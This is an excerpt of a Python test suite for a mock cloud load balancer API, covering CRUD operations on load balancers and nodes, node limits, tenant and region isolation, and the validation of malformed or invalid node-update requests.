updating_node_validation_error
)
from mimic.test.fixtures import APIMockHelper, TenantAuthentication
from mimic.rest.loadbalancer_api import LoadBalancerApi, LoadBalancerControlApi
from mimic.test.helpers import json_request, request_with_content, request
from mimic.util.helper import EMPTY_RESPONSE
import attr
class ResponseGenerationTests(SynchronousTestCase):
"""
    Tests for Load Balancer response generation.
"""
def test_canned_loadbalancer(self):
"""
Test that the canned load balancer response is returned as expected.
"""
expect_lb_name = "cannedTestLB"
expect_lb_protocol = "protocol"
expect_lb_port = 70
expect_lb_algorithm = "RANDOM"
expect_lb_httpsRedirect = "redirect"
expect_lb_halfClosed = "halfClosed"
expect_lb_connectionLogging = {"enabled": True}
expect_lb_contentCaching = True
expect_lb_timeout = 35
input_lb_info = {"name": expect_lb_name,
"protocol": expect_lb_protocol,
"port": expect_lb_port,
"timeout": expect_lb_timeout,
"httpsRedirect": expect_lb_httpsRedirect,
"halfClosed": expect_lb_halfClosed,
"connectionLogging": expect_lb_connectionLogging,
"contentCaching": expect_lb_contentCaching}
input_lb_id = "13579"
input_lb_time = "current_time"
input_lb_status = "ACTIVE"
actual = load_balancer_example(input_lb_info, input_lb_id, input_lb_status,
input_lb_time)
lb_example = {"name": expect_lb_name,
"id": input_lb_id,
"protocol": expect_lb_protocol,
"port": expect_lb_port,
"algorithm": expect_lb_algorithm,
"status": input_lb_status,
"cluster": {"name": "test-cluster"},
"timeout": expect_lb_timeout,
"created": {"time": input_lb_time},
"virtualIps": [{"address": "127.0.0.1",
"id": 1111, "type": "PUBLIC", "ipVersion": "IPV4"},
{"address": "0000:0000:0000:0000:1111:111b:0000:0000",
"id": 1111,
"type": "PUBLIC",
"ipVersion": "IPV6"}],
"sourceAddresses": {"ipv6Public": "0000:0001:0002::00/00",
"ipv4Servicenet": "127.0.0.1",
"ipv4Public": "127.0.0.1"},
"httpsRedirect": expect_lb_httpsRedirect,
"updated": {"time": input_lb_time},
"halfClosed": expect_lb_halfClosed,
"connectionLogging": expect_lb_connectionLogging,
"contentCaching": {"enabled": False}}
self.assertEqual(actual, lb_example)
@attr.s
class _CLBChangeResponseAndID(object):
"""
A simple data structure intended to conveniently communicate the results
of issuing a CLB control plane request.
"""
resp = attr.ib()
"The response returned from the .../attributes PATCH request."
lb_id = attr.ib()
"The CLB ID used for the purposes of performing the test."
class LoadbalancerAPITests(SynchronousTestCase):
"""
Tests for the Loadbalancer plugin API
"""
def setUp(self):
"""
        Create a :obj:`MimicCore` with :obj:`LoadBalancerApi` and :obj:`LoadBalancerControlApi` plugins.
"""
lb = LoadBalancerApi()
self.helper = APIMockHelper(self, [lb, LoadBalancerControlApi(lb_api=lb)])
self.root = self.helper.root
self.uri = self.helper.uri
def _create_loadbalancer(self, name=None, api_helper=None, nodes=None):
"""
Helper method to create a load balancer and return the lb_id.
        :param str name: The name of the load balancer, defaults to 'test_lb'
:param api_helper: An instance of :class:`APIMockHelper` - defaults to
the one created by setup, but if different regions need to be
created, for instance, your test may make a different helper, and
so that helper can be passed here.
:param list nodes: A list of nodes to create the load balancer with -
defaults to creating a load balancer with no nodes.
:return: Load balancer ID
:rtype: int
"""
api_helper = api_helper or self.helper
lb_body = {
"loadBalancer": {
"name": name or "test_lb",
"protocol": "HTTP",
"virtualIps": [{"type": "PUBLIC"}]
}
}
if nodes is not None:
lb_body['loadBalancer']['nodes'] = nodes
resp, body = self.successResultOf(json_request(
self, api_helper.root, b"POST", api_helper.uri + '/loadbalancers',
lb_body
))
return body['loadBalancer']['id']
def _patch_attributes_request(
self, lb_id_offset=0, status_key=None, status_val=None
):
"""
Creates a CLB for the tenant, then attempts to patch its status using
the CLB control plane endpoint.
:param int lb_id_offset: Defaults to 0. If provided, the CLB that is
created for the tenant will be referenced in the patch request
offset by this much.
:param str status_key: Defaults to '"status"'. If provided, the patch
will be made against this member of the CLB's state. Note that
            surrounding quotes are required for the key, thus giving the caller
the ability to deliberately distort the JSON.
:param str status_val: Defaults to 'PENDING_DELETE'. If provided, the
provided setting will be used for the status key provided.
:return: An instance of _CLBChangeResponseAndID. The `resp` attribute
            will refer to Mimic's response object; `lb_id` will be the ID of
            the CLB created for the test.
"""
ctl_uri = self.helper.auth.get_service_endpoint(
"cloudLoadBalancerControl", "ORD"
)
lb_id = self._create_loadbalancer('test_lb') + lb_id_offset
status_key = status_key or '"status"'
status_val = status_val or 'PENDING_DELETE'
payload = ('{{{0}: "{1}"}}'.format(status_key, status_val)
.encode("utf-8"))
set_attributes_req = request(
self, self.root, b"PATCH", "{0}/loadbalancer/{1}/attributes".format(
ctl_uri, lb_id
),
payload
)
return _CLBChangeResponseAndID(
resp=self.successResultOf(set_attributes_req), lb_id=lb_id
)
def test_lb_status_changes_as_requested(self):
"""
Clients can ``PATCH`` to the ``.../loadbalancer/<lb-id>/attributes``
:obj:`LoadBalancerControlApi` endpoint in order to change the
``status`` attribute on the load balancer identified by the given
load-balancer ID for the same tenant in the :obj:`LoadBalancerApi`.
This attribute controls the status code returned when the load balancer
is retrieved by a ``GET`` request.
"""
r = self._patch_attributes_request()
self.assertEqual(r.resp.code, 204)
get_lb = request(self, self.root, b"GET", self.uri + '/loadbalancers/' + str(r.lb_id))
get_lb_response = self.successResultOf(get_lb)
get_lb_response_body = self.successResultOf(
treq.json_content(get_lb_response)
)["loadBalancer"]
self.assertEqual(get_lb_response.code, 200)
self.assertEqual(get_lb_response_body["status"], "PENDING_DELETE")
def test_lb_status_change_with_illegal_json(self):
"""
In the event the user sends a malformed request body to the
.../attributes endpoint, we should get back a 400 Bad Request.
"""
r = self._patch_attributes_request(status_key="\"status'")
self.assertEqual(r.resp.code, 400)
def test_lb_status_change_with_bad_keys(self):
"""
In the event the user sends a request to alter a key which isn't
supported, we should get back a 400 Bad Request as well.
"""
r = self._patch_attributes_request(status_key="\"stats\"")
self.assertEqual(r.resp.code, 400)
def test_lb_status_change_to_illegal_status(self):
"""
If we attempt to set a valid status on a valid CLB for a valid tenant
to a value which is nonsensical, we should get back a 400.
"""
r = self._patch_attributes_request(status_val="KJDHSFLKJDSH")
self.assertEqual(r.resp.code, 400)
def test_lb_status_change_against_undefined_clb(self):
"""
In the event the user sends a request to alter a key on a load balancer
which doesn't belong to the requestor, we should get back a 404 code.
"""
r = self._patch_attributes_request(lb_id_offset=1000)
self.assertEqual(r.resp.code, 404)
def test_multiple_regions_multiple_endpoints(self):
"""
API object created with multiple regions has multiple entries
in the service catalog.
"""
helper = APIMockHelper(self,
[LoadBalancerApi(regions=['ORD', 'DFW'])])
entry = helper.service_catalog_json['access']['serviceCatalog'][0]
self.assertEqual(2, len(entry['endpoints']))
def test_add_load_balancer(self):
"""
If created without nodes, no node information appears in the response
when making a request to ``POST /v1.0/<tenant_id>/loadbalancers``.
"""
lb_name = 'mimic_lb'
resp, body = self.successResultOf(json_request(
self, self.root, b"POST", self.uri + '/loadbalancers',
{
"loadBalancer": {
"name": lb_name,
"protocol": "HTTP",
"virtualIps": [{"type": "PUBLIC"}]
}
}
))
self.assertEqual(resp.code, 202)
self.assertEqual(body['loadBalancer']['name'], lb_name)
self.assertNotIn("nodeCount", body["loadBalancer"])
self.assertNotIn("nodes", body["loadBalancer"])
def test_add_load_balancer_request_with_no_body_causes_bad_request(self):
"""
Test to verify :func:`add_load_balancer` on ``POST /v1.0/<tenant_id>/loadbalancers``
"""
create_lb = request(self, self.root, b"POST", self.uri + '/loadbalancers', b"")
create_lb_response = self.successResultOf(create_lb)
self.assertEqual(create_lb_response.code, 400)
def test_add_load_balancer_request_with_invalid_body_causes_bad_request(self):
"""
Test to verify :func:`add_load_balancer` on ``POST /v1.0/<tenant_id>/loadbalancers``
"""
create_lb = request(self, self.root, b"POST", self.uri + '/loadbalancers', b"{ bad request: }")
create_lb_response = self.successResultOf(create_lb)
self.assertEqual(create_lb_response.code, 400)
def test_add_load_balancer_with_nodes(self):
"""
Making a request to ``POST /v1.0/<tenant_id>/loadbalancers`` with
nodes adds the nodes to the load balancer.
"""
lb_name = 'mimic_lb'
resp, body = self.successResultOf(json_request(
self, self.root, b"POST", self.uri + '/loadbalancers',
{
"loadBalancer": {
"name": lb_name,
"protocol": "HTTP",
"virtualIps": [{"type": "PUBLIC"}],
"nodes": [{"address": "127.0.0.2",
"port": 80,
"condition": "ENABLED",
"type": "PRIMARY"},
{"address": "127.0.0.0",
"port": 80,
"condition": "ENABLED",
"type": "SECONDARY"}]
}
}
))
self.assertEqual(resp.code, 202)
self.assertNotIn("nodeCount", body['loadBalancer'])
self.assertEqual(len(body['loadBalancer']['nodes']), 2)
def test_list_loadbalancers(self):
"""
        Test to verify :func:`list_load_balancers` on ``GET /v1.0/<tenant_id>/loadbalancers``
Create two load balancers, then list them and verify the ids
"""
test1_id = self._create_loadbalancer('test1')
test2_id = self._create_loadbalancer('test2')
list_lb = request(self, self.root, b"GET", self.uri + '/loadbalancers')
list_lb_response = self.successResultOf(list_lb)
list_lb_response_body = self.successResultOf(treq.json_content(list_lb_response))
self.assertEqual(list_lb_response.code, 200)
self.assertEqual(len(list_lb_response_body['loadBalancers']), 2)
self.assertTrue(list_lb_response_body['loadBalancers'][0]['id'] in [test1_id, test2_id])
self.assertTrue(list_lb_response_body['loadBalancers'][1]['id'] in [test1_id, test2_id])
self.assertTrue(list_lb_response_body['loadBalancers'][0]['id'] !=
list_lb_response_body['loadBalancers'][1]['id'])
def test_list_loadbalancers_have_no_nodes(self):
"""
When listing load balancers, nodes do not appear even if the load
        balancer has nodes. "nodeCount" is present for all the load
balancers, whether or not there are nodes on the load balancer.
"""
self._create_loadbalancer('no_nodes')
self._create_loadbalancer(
'3nodes', nodes=[{"address": "1.1.1.{0}".format(i),
"port": 80, "condition": "ENABLED"}
for i in range(1, 4)])
list_resp, list_body = self.successResultOf(json_request(
self, self.root, b"GET", self.uri + '/loadbalancers'))
self.assertEqual(list_resp.code, 200)
self.assertEqual(len(list_body['loadBalancers']), 2)
for lb in list_body['loadBalancers']:
self.assertNotIn("nodes", lb)
self.assertEqual(
lb['nodeCount'],
0 if lb['name'] == 'no_nodes' else 3)
def test_delete_loadbalancer(self):
"""
        Test to verify :func:`delete_load_balancer` on
        ``DELETE /v1.0/<tenant_id>/loadbalancers/<lb_id>``
        Create two load balancers, delete one, then list to verify only the other remains
"""
# These will fail if the servers weren't created
test1_id = self._create_loadbalancer('test1')
test2_id = self._create_loadbalancer('test2')
delete_lb = request(self, self.root, b'DELETE', self.uri + '/loadbalancers/' + str(test1_id))
del_lb_response = self.successResultOf(delete_lb)
# This response code does not match the Rackspace documentation which specifies a 200 response
# See comment: http://bit.ly/1AVHs3v
self.assertEqual(del_lb_response.code, 202)
del_lb_response_body = self.successResultOf(treq.content(del_lb_response))
self.assertEqual(del_lb_response_body, b'')
# List lb to make sure the correct lb is gone and the other remains
list_lb = request(self, self.root, b"GET", self.uri + '/loadbalancers')
list_lb_response = self.successResultOf(list_lb)
list_lb_response_body = self.successResultOf(treq.json_content(list_lb_response))
self.assertTrue(len(list_lb_response_body['loadBalancers']), 1)
self.assertTrue(list_lb_response_body['loadBalancers'][0]['id'] == test2_id)
def test_get_loadbalancer_with_nodes(self):
"""
If there are nodes on the load balancer, "nodes" (but not "nodeCount")
appears in the response when making a request to
``GET /v1.0/<tenant_id>/loadbalancers/<loadbalancer_id>``.
"""
lb_id = self._create_loadbalancer(
nodes=[{"address": "1.2.3.4", "port": 80, "condition": "ENABLED"}])
resp, body = self.successResultOf(json_request(
self, self.root, b"GET", self.uri + '/loadbalancers/' + str(lb_id)))
self.assertEqual(resp.code, 200)
self.assertEqual(body['loadBalancer']['id'], lb_id)
self.assertNotIn('nodeCount', body['loadBalancer'])
self.assertEqual(len(body['loadBalancer']['nodes']), 1)
def test_get_loadbalancer_no_nodes(self):
"""
If there are no nodes on the load balancer, then neither "nodeCount"
nor "nodes" appear in the response when making a request to
``GET /v1.0/<tenant_id>/loadbalancers/<loadbalancer_id>``
"""
lb_id = self._create_loadbalancer()
resp, body = self.successResultOf(json_request(
self, self.root, b"GET", self.uri + '/loadbalancers/' + str(lb_id)))
self.assertEqual(resp.code, 200)
self.assertEqual(body['loadBalancer']['id'], lb_id)
self.assertNotIn('nodeCount', body['loadBalancer'])
self.assertNotIn('nodes', body['loadBalancer'])
def test_get_non_existant_loadbalancer(self):
"""
        Test to verify :func:`get_load_balancers` for a non-existent load balancer id.
"""
get_lb = request(self, self.root, b"GET", self.uri + '/loadbalancers/123')
get_lb_response = self.successResultOf(get_lb)
self.assertEqual(get_lb_response.code, 404)
def test_delete_non_existant_loadbalancer(self):
"""
        Test to verify :func:`delete_load_balancers` for a non-existent load balancer.
"""
delete_lb = request(self, self.root, b'DELETE', self.uri + '/loadbalancers/123')
delete_lb_response = self.successResultOf(delete_lb)
self.assertEqual(delete_lb_response.code, 404)
def test_list_loadbalancers_when_none_exist(self):
"""
Test to verify :func:`list_load_balancers` when no loadbalancers exist.
"""
list_lb = request(self, self.root, b'GET', self.uri + '/loadbalancers')
list_lb_response = self.successResultOf(list_lb)
self.assertEqual(list_lb_response.code, 200)
list_lb_response_body = self.successResultOf(treq.json_content(list_lb_response))
self.assertEqual(list_lb_response_body, {"loadBalancers": []})
def test_different_tenants_same_region_different_lbs(self):
"""
Creating a LB for one tenant in a particular region should not
create it for other tenants in the same region.
"""
self._create_loadbalancer()
other_tenant = TenantAuthentication(self, self.root, "other", "other")
list_lb_response, list_lb_response_body = self.successResultOf(
request_with_content(
self, self.root, b"GET",
other_tenant.get_service_endpoint("cloudLoadBalancers")
+ "/loadbalancers"))
self.assertEqual(list_lb_response.code, 200)
list_lb_response_body = json.loads(
list_lb_response_body.decode("utf-8")
)
self.assertEqual(list_lb_response_body, {"loadBalancers": []})
def test_same_tenant_different_regions(self):
"""
        Creating an LB for a tenant in one region should not create it
        in another region for that tenant.
"""
helper = APIMockHelper(self,
[LoadBalancerApi(regions=["ORD", "DFW"])])
self._create_loadbalancer(api_helper=helper)
list_lb_response, list_lb_response_body = self.successResultOf(
request_with_content(
self, helper.root, b"GET",
helper.get_service_endpoint("cloudLoadBalancers", "DFW")
+ "/loadbalancers"))
self.assertEqual(list_lb_response.code, 200)
list_lb_response_body = json.loads(
list_lb_response_body.decode("utf-8")
)
self.assertEqual(list_lb_response_body, {"loadBalancers": []})
def _bulk_delete(test_case, root, uri, lb_id, node_ids):
"""Bulk delete multiple nodes."""
query = '?' + '&'.join('id=' + str(node_id) for node_id in node_ids)
endpoint = uri + '/loadbalancers/' + str(lb_id) + '/nodes' + query
d = request(test_case, root, b"DELETE", endpoint)
response = test_case.successResultOf(d)
body = test_case.successResultOf(treq.content(response))
if body == b'':
body = EMPTY_RESPONSE
else:
body = json.loads(body.decode("utf-8"))
return response, body
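# Example of the query built above (a sketch): _bulk_delete(case, root, uri, 7, [1, 2])
# issues DELETE <uri>/loadbalancers/7/nodes?id=1&id=2 and returns (response, parsed body).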
def _update_clb_node(test_case, helper, lb_id, node_id, update_data,
request_func=json_request):
"""
Return the response for updating a CLB node.
"""
return test_case.successResultOf(request_func(
test_case, helper.root, b"PUT",
"{0}/loadbalancers/{1}/nodes/{2}".format(
helper.get_service_endpoint("cloudLoadBalancers"),
lb_id, node_id),
update_data
))
class LoadbalancerNodeAPITests(SynchronousTestCase):
"""
Tests for the Loadbalancer plugin API for CRUD for nodes.
"""
def setUp(self):
"""
Create a :obj:`MimicCore` with :obj:`LoadBalancerApi` as the only plugin.
        Then create a load balancer and add nodes to it.
"""
self.helper = APIMockHelper(self, [LoadBalancerApi()])
self.root = self.helper.root
self.uri = self.helper.uri
create_lb = request(
self, self.root, b"POST", self.uri + '/loadbalancers',
json.dumps({
"loadBalancer": {
"name": "test_lb",
"protocol": "HTTP",
"virtualIps": [{"type": "PUBLIC"}]
}
}).encode("utf-8")
)
create_lb_response = self.successResultOf(create_lb)
self.create_lb_response_body = self.successResultOf(treq.json_content(
create_lb_response))
self.lb_id = self.create_lb_response_body["loadBalancer"]["id"]
create_node = self._create_nodes(["127.0.0.1"])
[(self.create_node_response, self.create_node_response_body)] = create_node
self.node = self.create_node_response_body["nodes"]
def _create_nodes(self, addresses):
"""
Create nodes based on the addresses passed.
:param list addresses: addresses to create nodes for.
:return: a list of two-tuples of (response, response_body).
"""
responses = [
request(
self, self.root, b"POST", self.uri + '/loadbalancers/' +
str(self.create_lb_response_body["loadBalancer"]["id"]) + '/nodes',
json.dumps({"nodes": [{"address": address,
"port": 80,
"condition": "ENABLED",
"type": "PRIMARY",
"weight": 10}]}).encode("utf-8"))
for address in addresses]
responses = [self.successResultOf(response) for response in responses]
response_bodies = [self.successResultOf(treq.json_content(response))
for response in responses]
return zip(responses, response_bodies)
def _get_nodes(self, lb_id):
"""Get all the nodes in a LB."""
list_nodes = request(
self, self.root, b"GET", self.uri + '/loadbalancers/' +
str(lb_id) + '/nodes')
response = self.successResultOf(list_nodes)
body = self.successResultOf(treq.json_content(response))
return body['nodes']
def test_add_node_to_loadbalancer(self):
"""
        Test to verify :func: `add_node` creates a node successfully.
"""
self.assertEqual(self.create_node_response.code, 202)
self.assertEqual(len(self.create_node_response_body["nodes"]), 1)
# verify that the node has all the attributes
node1 = self.create_node_response_body["nodes"][0]
self.assertEqual(node1["status"], "ONLINE")
self.assertEqual(node1["port"], 80)
self.assertEqual(node1["type"], "PRIMARY")
self.assertTrue(node1["id"])
self.assertEqual(node1["address"], "127.0.0.1")
self.assertEqual(node1["condition"], "ENABLED")
self.assertEqual(node1["weight"], 10)
def test_add_multiple_nodes(self):
"""
        Test to verify :func: `add_node` creates multiple nodes successfully.
"""
create_multiple_nodes = request(
self, self.root, b"POST", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes',
json.dumps({"nodes": [{"address": "127.0.0.2",
"port": 80,
"condition": "ENABLED",
"type": "PRIMARY"},
{"address": "127.0.0.0",
"port": 80,
"condition": "ENABLED",
"type": "SECONDARY"}]}).encode("utf-8")
)
create_node_response = self.successResultOf(create_multiple_nodes)
create_node_response_body = self.successResultOf(treq.json_content(
create_node_response))
self.assertEqual(create_node_response.code, 202)
self.assertEqual(len(create_node_response_body["nodes"]), 2)
def test_add_duplicate_node(self):
"""
Test to verify :func: `add_node` does not allow creation of duplicate nodes.
"""
create_duplicate_nodes = request(
self, self.root, b"POST", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes',
json.dumps({"nodes": [{"address": "127.0.0.1",
"port": 80,
"condition": "ENABLED",
"type": "PRIMARY"}]}).encode("utf-8")
)
create_node_response = self.successResultOf(create_duplicate_nodes)
self.assertEqual(create_node_response.code, 413)
def test_add_single_over_node_limit(self):
"""
        Test to verify :func: `add_node` does not allow adding a single node
        when doing so would exceed the node limit.
Note: This assumes the node limit is 25. If the limit is made
configurable, this test will need to be updated.
"""
for port in range(101, 126):
request(
self, self.root, b"POST", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes',
json.dumps({"nodes": [{"address": "127.0.0.1",
"port": port,
"condition": "ENABLED"}]})
.encode("utf-8")
)
create_over_node = request(
self, self.root, b"POST", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes',
json.dumps({"nodes": [{"address": "127.0.0.2",
"port": 130,
"condition": "ENABLED",
"type": "SECONDARY"}]}).encode("utf-8")
)
create_node_response = self.successResultOf(create_over_node)
self.assertEqual(create_node_response.code, 413)
def test_add_bulk_nodes_over_limit(self):
"""
        Test to verify :func: `add_node` does not allow a bulk creation
        request to exceed the node limit.
Note: This assumes the node limit is 25. If the limit is made
configurable, this test will need to be updated.
"""
add_node_list = []
for a in range(26):
node_addr = "127.0.0.{0}".format(a)
add_node_list.append({"address": node_addr,
"port": 88,
"condition": "ENABLED",
"type": "SECONDARY"})
create_over_node = request(
self, self.root, b"POST", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes',
json.dumps({"nodes": add_node_list}).encode("utf-8")
)
create_node_response = self.successResultOf(create_over_node)
self.assertEqual(create_node_response.code, 413)
def test_add_node_request_with_no_body_causes_bad_request(self):
"""
        Test to verify :func: `add_node` returns a 400 bad request when the
        request has no body.
"""
create_duplicate_nodes = request(
self, self.root, b"POST", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes', b"")
create_node_response = self.successResultOf(create_duplicate_nodes)
self.assertEqual(create_node_response.code, 400)
def test_add_node_request_with_invalid_body_causes_bad_request(self):
"""
        Test to verify :func: `add_node` returns a 400 bad request when the
        request body is not valid JSON.
"""
create_duplicate_nodes = request(
self, self.root, b"POST", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes', b"{ bad request: }")
create_node_response = self.successResultOf(create_duplicate_nodes)
self.assertEqual(create_node_response.code, 400)
def test_add_node_to_non_existant_loadbalancer(self):
"""
Test to verify :func: `add_node` does not allow creation of nodes
        on non-existent load balancers.
"""
create_duplicate_nodes = request(
self, self.root, b"POST", self.uri + '/loadbalancers/123/nodes',
json.dumps({"nodes": [{"address": "127.0.0.1",
"port": 80,
"condition": "ENABLED",
"type": "PRIMARY"}]}).encode("utf-8")
)
create_node_response = self.successResultOf(create_duplicate_nodes)
self.assertEqual(create_node_response.code, 404)
def test_list_nodes_on_loadbalancer(self):
"""
Test to verify :func: `list_node` lists the nodes on the loadbalancer.
"""
list_nodes = request(
self, self.root, b"GET", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes')
list_nodes_response = self.successResultOf(list_nodes)
list_nodes_response_body = self.successResultOf(treq.json_content(
list_nodes_response))
self.assertEqual(list_nodes_response.code, 200)
self.assertEqual(len(list_nodes_response_body["nodes"]), 1)
def test_list_nodes_on_non_existant_loadbalancer(self):
"""
        Test to verify :func: `list_node` returns a 404 for a non-existent
        load balancer.
"""
list_nodes = request(
self, self.root, b"GET", self.uri + '/loadbalancers/123/nodes')
list_nodes_response = self.successResultOf(list_nodes)
self.assertEqual(list_nodes_response.code, 404)
def test_get_node_on_loadbalancer(self):
"""
        Test to verify :func: `get_node` gets a node on the load balancer.
"""
get_nodes = request(
self, self.root, b"GET", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes/'
+ str(self.node[0]["id"]))
get_node_response = self.successResultOf(get_nodes)
get_node_response_body = self.successResultOf(treq.json_content(
get_node_response))
self.assertEqual(get_node_response.code, 200)
self.assertEqual(len(self.node), 1)
self.assertEqual(get_node_response_body["node"]["id"],
self.node[0]["id"])
def test_get_node_on_non_existant_loadbalancer(self):
"""
        Test to verify :func: `get_node` does not get a node on a
        non-existent load balancer.
"""
get_nodes = request(
self, self.root, b"GET", self.uri + '/loadbalancers/123' +
'/nodes/' + str(self.node[0]["id"]))
get_node_response = self.successResultOf(get_nodes)
self.assertEqual(get_node_response.code, 404)
def test_get_non_existant_node_on_loadbalancer(self):
"""
        Test to verify :func: `get_node` does not get a non-existent node.
"""
get_nodes = request(
self, self.root, b"GET", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes/123')
get_node_response = self.successResultOf(get_nodes)
self.assertEqual(get_node_response.code, 404)
def test_delete_node_on_loadbalancer(self):
"""
Test to verify :func: `delete_node` deletes the node on the loadbalancer.
"""
delete_nodes = request(
self, self.root, b"DELETE", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes/'
+ str(self.node[0]["id"]))
delete_node_response = self.successResultOf(delete_nodes)
self.assertEqual(delete_node_response.code, 202)
# assert that it lists correctly after
list_nodes_resp, list_nodes_body = self.successResultOf(json_request(
self, self.root, b"GET", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes'))
self.assertEqual(list_nodes_resp.code, 200)
self.assertEqual(len(list_nodes_body["nodes"]), 0)
def test_delete_node_on_non_existant_loadbalancer(self):
"""
        Test to verify :func: `delete_node` does not delete a node on a
        non-existent load balancer.
"""
delete_nodes = request(
self, self.root, b"DELETE", self.uri + '/loadbalancers/123' +
'/nodes/' + str(self.node[0]["id"]))
delete_node_response = self.successResultOf(delete_nodes)
self.assertEqual(delete_node_response.code, 404)
def test_delete_non_existant_node_on_loadbalancer(self):
"""
        Test to verify :func: `delete_node` does not delete a non-existent node.
"""
delete_nodes = request(
self, self.root, b"DELETE", self.uri + '/loadbalancers/' +
str(self.lb_id) + '/nodes/123')
delete_node_response = self.successResultOf(delete_nodes)
self.assertEqual(delete_node_response.code, 404)
def test_bulk_delete(self):
"""
Test to verify :func: `delete_nodes` deletes the nodes on the loadbalancer.
"""
node_results = self._create_nodes(['127.0.0.2', '127.0.0.3', '127.0.0.4'])
node_ids = [
node_result['id']
for (response, body) in node_results
for node_result in body['nodes']]
node_ids_to_delete = node_ids[:-1]
response, body = _bulk_delete(
self, self.root, self.uri, self.lb_id, node_ids_to_delete)
self.assertEqual(response.code, 202)
self.assertEqual(body, EMPTY_RESPONSE)
remaining_nodes = self._get_nodes(self.lb_id)
# The one in setUp and the extra one we created are remaining
self.assertEqual(
[node['id'] for node in remaining_nodes],
[self.node[0]['id'], node_ids[-1]])
def test_bulk_delete_no_nodes(self):
"""
When deleting multiple nodes but not giving any node IDs, a special
error is returned.
"""
response, body = _bulk_delete(
self, self.root, self.uri, self.lb_id, [])
self.assertEqual(response.code, 400)
self.assertEqual(
body,
{'code': 400,
'message': "Must supply one or more id's to process this request."})
def test_bulk_delete_no_nodes_invalid_lb(self):
"""
When trying to delete multiple nodes from a non-existent LB, the error
for an empty node list takes precedence over the error for a
non-existing LB.
"""
lb_id = self.lb_id + 1
response, body = _bulk_delete(self, self.root, self.uri, lb_id, [])
self.assertEqual(response.code, 400)
self.assertEqual(
body,
{'code': 400,
'message': "Must supply one or more id's to process this request."})
def test_bulk_delete_invalid_lb(self):
"""
Bulk-deleting nodes from a non-existent LB returns a 404 and an appropriate
message.
"""
lb_id = self.lb_id + 1
node_ids_to_delete = [self.node[0]['id']]
response, body = _bulk_delete(self, self.root, self.uri, lb_id, node_ids_to_delete)
self.assertEqual(response.code, 404)
self.assertEqual(
body,
{'code': 404,
'message': "Load balancer not found"})
def test_bulk_delete_nonexistent_nodes(self):
"""
When trying to delete multiple nodes, if any of the nodes don't exist, no
nodes are deleted and a special error result is returned.
"""
node_ids_to_delete = [self.node[0]['id'], 1000000, 1000001]
response, body = _bulk_delete(
self, self.root, self.uri, self.lb_id, node_ids_to_delete)
self.assertEqual(response.code, 400)
self.assertEqual(
body,
{
"validationErrors": {
"messages": [
"Node ids 1000000,1000001 are not a part of your loadbalancer"
]
},
"message": "Validation Failure",
"code": 400,
"details": "The object is not valid"
}
)
# and the one valid node that we tried to delete is still there
remaining = [node['id'] for node in self._get_nodes(self.lb_id)]
        self.assertEqual(remaining, [self.node[0]['id']])
def test_updating_node_invalid_json(self):
"""
When updating a node, if invalid JSON is provided (both actually not
valid JSON and also not conforming to the schema), a 400 invalid
JSON error will be returned. This takes precedence over whether or not
a load balancer or node actually exists, and precedence over
validation errors.
"""
real_lb_id = self.lb_id
real_node_id = self.node[0]['id']
fake_lb_id = real_lb_id + 1
fake_node_id = real_node_id + 1
combos = ((real_lb_id, real_node_id),
(real_lb_id, fake_node_id),
(fake_lb_id, fake_node_id))
invalids = (
{"node": {"weight": 1, "hockey": "stick"}},
{"node": {"weight": 1, "status": "OFFLINE"}},
{"node": {"weight": 1},
"other": "garbage"},
{"node": []},
{"node": 1},
{"nodes": {"weight": 1}},
[],
b"not JSON",
{"node": {"weight": "not a number", "address": "1.1.1.1"}},
{"node": {"condition": "INVALID", "id": 1}},
{"node": {"type": "INVALID", "weight": 1000}},
{"node": {"weight": "not a number", "port": 80}}
)
expected = invalid_json_schema()
for lb_id, node_id in combos:
for invalid in invalids:
resp, body = _update_clb_node(
self, self.helper, lb_id, node_id, invalid)
self.assertEqual(
(body, resp.code), expected,
"{0} should have returned invalid JSON error".format(
invalid))
self.assertEqual(
self._get_nodes(real_lb_id), self.node)
def test_updating_node_validation_error(self):
"""
When updating a node, if the address or port are provided,
a 400 validation error will be returned because those are immutable.
        If the weight is <1 or >100, a 400 validation error will also be returned.
        These take precedence over whether or not a load balancer or node
actually exists. The error message also contains a list of all the
validation failures.
"""
real_lb_id = self.lb_id
real_node_id = self.node[0]['id']
fake_lb_id = real_lb_id + 1
fake_node_id = real_node_id + 1
combos = ((real_lb_id, real_node_id),
(real_lb_id, fake_node_id),
(fake_lb_id, fake_node_id))
for lb_id, node_id in combos:
data = {"node": {"weight": 1000, "address": "1.1.1.1",
"port": 80, "type": "PRIMARY", "id": 12345}}
for popoff in (None, "address", "port", "weight"):
if popoff:
del data["node"][popoff]
resp, body = _update_clb_node(
self, self.helper, lb_id, node_id, data)
actual = (body, resp.code)
expected = updating_node_validation_error(
address="address" in data["node"],
port="port" in data["node"],
weight="weight" in data["node"],
id=True) # id is always there
self.assertEqual(
actual, expected,
"Input of {0}.\nGot: {1}\nExpected: {2}".format(
data,
json.dumps(actual, indent=2),
json.dumps(expected, indent=2)))
self.assertEqual(
self._get_nodes(real_lb_id), self.node)
def test_updating_node_checks_for_invalid_loadbalancer_id(self):
"""
If the input is valid, but the load balancer ID does not exist,
a 404 error is returned.
"""
resp, body = _update_clb_node(
self, self.helper, self.lb_id + 1, 1234, {"node": {"weight": 1}})
self.assertEqual((body, resp.code), loadbalancer_not_found())
self.assertEqual(self._get_nodes(self.lb_id), self.node)
def test_updating_node_checks_for_invalid_node_id(self):
"""
If the input is valid, but the node ID does not exist, a 404 error is
returned.
"""
resp, body = _update_clb_node(
self, self.helper, self.lb_id, self.node[0]["id"] + 1,
{"node": {"weight": 1}})
self.assertEqual((body, resp.code), node_not_found())
self.assertEqual(self._get_nodes(self.lb_id), self.node)
def test_updating_node_success(self):
"""
        Updating a node successfully changes its values. A successful update
        returns a 202 with an empty body. It also updates the atom feed of
        the node, which is returned when GETing
        ../loadbalancers/lbid/nodes/nodeid.atom
"""
